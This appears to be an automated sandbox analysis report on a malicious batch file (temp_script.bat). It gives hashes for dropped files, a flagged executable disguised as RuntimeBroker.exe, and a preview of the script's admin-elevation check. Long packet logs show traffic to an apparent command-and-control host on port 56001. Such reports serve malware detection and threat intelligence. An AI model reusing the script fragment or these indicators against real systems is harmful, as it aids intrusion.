                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:modified
                      Size (bytes):449024
                      Entropy (8bit):7.990550406581685
                      Encrypted:true
                      SSDEEP:6144:4hE8FrC1mJDf1nkhf2TO1WGf+CXhJyBl6mVLdWYrS+ZbHegrrHW3JkGYhtoLQvlN:1mHmEOQGZv+Zb33HMYHoLQrdQq
                      MD5:7557AF6F3185128C25AEB092DC335975
                      SHA1:F0866402529BE2FDC0511305DA069B69A8A35B8E
                      SHA-256:5FCEE9DA2E237DF74B7C2619BDE63DB40C92C2E6C51BD483C86F83DCDFDE1EAB
                      SHA-512:DE6375E57A674AC063AECD499D8B7FF01EBAAAFB7352CE560A2468293B3D7F7B95A5AC53751728EF0578ADCB5BF0518CE08F55CD7BD3EDD1C13B0A4866301E9B
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 66%
                      Joe Sandbox View:
                      • Filename: 4FwNHRnnXb.exe, Detection: malicious, Browse
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..............+... ........@.. .......................@............@..................................+..O.......t.................... .......+............................................... ............... ..H............text........ ...................... ..`.rsrc...t...........................@..@.reloc....... ......................@..B.................+......H........!...............................................................(....*B(....(....o....*.0..7.......(....t....r...po..........(.....rM..p(..........o....&*..0..|.......s.....(....s.....~.............~....o....&..(....&..s.......o.....o............i(...........,..o......,..o......,..o.......*.(....:.![..........Te..........io......Z .........%.....(....*..( ...*.......*.BSJB............v4.0.30319......l...L...#~......h...#Strings.... ...d...#US.........#GUID.......l...
                      Process:C:\Windows\System32\cacls.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):121
                      Entropy (8bit):4.323081947925383
                      Encrypted:false
                      SSDEEP:3:ohAIQDMCZArMsxo2xRSvFFwIFMW3Gtvn:ohYD+82xmwIyHtv
                      MD5:43B1EC1407EA9C0219A563FFFEEAE780
                      SHA1:C42041802E99A95E6CBAE13E3E20EBFBA3237BB2
                      SHA-256:7E5146BF6F0B6AA61AFD4E3A6031D6DEF0F37523A22D75086B8E0E21D22E4B16
                      SHA-512:5307D7E089BEA4DAC250D0B606C80DF13CCA0A7ECB622BF61B37AD736FFC44EA68F9B993E4743F2AB220FF950E9D9B423524D4E10C0B2D1CE280A7D9B5095DE0
                      Malicious:false
                      Preview:C:\Windows\system32\config\SYSTEM NT AUTHORITY\SYSTEM:F .. BUILTIN\Administrators:F ....
                      File type:ASCII text, with CRLF line terminators
                      Entropy (8bit):5.329525308104839
                      TrID:
                        File name:temp_script.bat
                        File size:1'667 bytes
                        MD5:7972cb9d1ef5a286c735bb8da928fbda
                        SHA1:98e294e14777cc9e5a3c7166b35b2feba3b3f140
                        SHA256:649dd265b8599866e827d12135b10b2b415d221ca4db58e1cf8c602c6afa2466
                        SHA512:f5ff10c65903c5b300eca4ba83366bf5c049eba8cf0c0b357923f5629082d3688dc5c61e36ebbaf8e6de0e44d9cb1405639fa157376996e82d541db4521c16c8
                        SSDEEP:48:0XO7BK7E4ep5hoI8BnV6J5j5xB5V5h5/gyx:0XHVeGI8hugyx
                        TLSH:F9310D220C4FA74AE7B2CDB4C2122708FA5FA34374188543B2B698206D587C5CBFEDD8
                        File Content Preview:..@echo off..set "filePath=%appdata%\Microsoft\emptyfile20947.txt"..:: BatchGotAdmin..:-------------------------------------..REM --> Check for permissions.. IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (..>nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SY
                        Icon Hash:9686878b929a9886
                        Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                        Aug 6, 2024 18:12:10.901654005 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:10.901679039 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:10.902033091 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:10.911817074 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:10.911830902 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.385457993 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.385535955 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.388705015 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.388715029 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.388969898 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.406569958 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.448503017 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.741720915 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.741782904 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.741816998 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.741837978 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.741868973 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.741883039 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.741900921 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.741935015 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.741941929 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.741960049 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.741966963 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.742008924 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.742026091 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.742033005 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.742297888 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.746773958 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.790190935 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.790210009 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.828975916 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.829025984 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.829057932 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.829070091 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.829086065 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.829122066 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.829147100 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.829185963 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.829235077 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.829236984 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.829248905 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.829272032 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.829323053 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.829356909 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.829370022 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.829380989 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.829423904 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.830341101 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.830420017 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.830451012 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.830475092 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.830478907 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.830492973 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.830526114 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.830988884 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.831051111 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.831062078 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.831145048 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.831182003 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.831193924 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.831199884 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.831240892 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.832446098 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.832544088 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.832607985 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.832623959 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.884310007 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.915940046 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.916016102 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.916049004 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.916076899 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.916099072 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.916107893 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.916126013 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.916162968 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.916191101 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.916455984 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.916517019 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.916832924 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.916896105 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.916919947 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.916984081 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.917694092 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.917752981 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.917859077 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.917918921 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.918654919 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.918716908 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.918821096 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.918889999 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:11.919604063 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:11.919672966 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:12.002441883 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.002490997 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.002525091 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:12.002594948 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.002638102 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:12.002656937 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.002688885 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:12.002708912 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.002732992 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:12.002770901 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.002818108 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:12.002834082 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.002907038 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:12.003432989 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.003484011 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.003498077 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:12.003515959 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.003535986 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.003541946 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:12.003570080 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:12.003580093 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.003607035 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:12.004678011 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.004750967 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:12.004770994 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.004889011 CEST  49704        443        192.168.2.5   188.114.96.3
                        Aug 6, 2024 18:12:12.005060911 CEST  443          49704      188.114.96.3  192.168.2.5
                        Aug 6, 2024 18:12:12.005119085 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.005266905 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.005321980 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.005328894 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.005345106 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.005373001 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.005398035 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.005435944 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.005443096 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.005450964 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.005477905 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.006037951 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.006084919 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.006094933 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.006122112 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.006151915 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.006159067 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.006172895 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.007675886 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.007731915 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.007745028 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.008002043 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.008579969 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.008655071 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.008862972 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.008924961 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.009691954 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.009778023 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.010819912 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.010907888 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.010957956 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.010965109 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.010996103 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.011055946 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.011121988 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.011128902 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.011188030 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.090806007 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.090876102 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.090923071 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.090922117 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.090941906 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.090985060 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.090996981 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091051102 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091062069 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091079950 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091120958 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091126919 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091140985 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091167927 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091187954 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091188908 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091207027 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091237068 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091262102 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091314077 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091320992 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091425896 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091466904 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091475010 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091533899 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091578007 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091583967 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091681957 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.091732979 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.091738939 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.092197895 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.092221022 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.092257023 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.092262983 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.092303991 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.095922947 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.095953941 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.095994949 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.096002102 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.096038103 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.096380949 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.096406937 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.096447945 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.096452951 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.096467972 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.096491098 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.096507072 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.096510887 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.096545935 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.096550941 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.096580982 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.096621990 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.176649094 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.176680088 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.176748037 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.176772118 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.176821947 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.176843882 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.179595947 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.179619074 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.179702044 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.179717064 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.179761887 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.180022955 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180053949 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180126905 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.180134058 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180250883 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.180411100 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180429935 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180490971 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.180497885 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180725098 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.180785894 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180802107 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180849075 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.180855036 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180921078 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180941105 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180947065 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.180954933 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.180989981 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.181015968 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.181030989 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.181041956 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.181050062 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.181123018 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.181389093 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.181406975 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.181461096 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.181466103 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.181520939 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.262851954 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.262897968 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.262984991 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.262999058 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.263024092 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.263058901 CEST44349704188.114.96.3192.168.2.5
                        Aug 6, 2024 18:12:12.263062000 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.263103962 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:12.289619923 CEST49704443192.168.2.5188.114.96.3
                        Aug 6, 2024 18:12:14.982495070 CEST4970556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:14.987843990 CEST560014970545.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:14.987998009 CEST4970556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:14.990932941 CEST4970556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:14.996669054 CEST560014970545.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:15.013216972 CEST4970556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:15.018275023 CEST560014970545.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:36.381768942 CEST560014970545.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:36.381881952 CEST4970556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:37.901627064 CEST4970556001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:37.902767897 CEST4971256001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:37.907437086 CEST560014970545.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:37.908382893 CEST560014971245.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:37.908454895 CEST4971256001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:37.908538103 CEST4971256001192.168.2.545.11.229.96
                        Aug 6, 2024 18:12:37.915512085 CEST560014971245.11.229.96192.168.2.5
                        Aug 6, 2024 18:12:37.915579081 CEST4971256001192.168.2.545.11.229.96
